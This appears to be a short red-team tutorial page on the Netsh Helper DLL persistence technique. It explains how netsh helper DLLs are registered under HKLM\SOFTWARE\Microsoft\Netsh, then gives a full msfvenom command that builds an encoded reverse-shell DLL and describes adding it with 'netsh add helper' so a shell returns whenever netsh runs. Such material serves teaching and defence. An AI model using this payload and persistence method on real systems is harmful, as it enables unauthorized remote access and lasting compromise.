Netsh Helper DLL

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if software (ex:VPN) is present on the system that executes netsh.exe as part of its normal functionality.


Netsh is a command-line scripting utility that allows you to display or modify the network configuration of a computer that is currently running. Net sh also provides scripting features that allows you to run a group of commands in batch mode against a specific computer.

Netsh interacts with other operating system components by using dynamic-link library (DLL) files. Each netsh helper DLL provides an extensive set of features. Netsh functionality can be extended with the use of DLL files.

We first create our dll payload and send it to the target workstation using the msfvenom command:

msfvenom --platform Windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST= LPORT=4444 --encoder x64/xor --iterations 10 --format dll --out payload.dll

Once we send our payload with netsh we will add a helper with netsh add helper and point it to our dll payload.

Once our helper is added we immediately get a connection, but we are trying to work as a persistence method so we can close this window and wait until the user uses at any point netsh and we shall receive a reverse shell


Last updated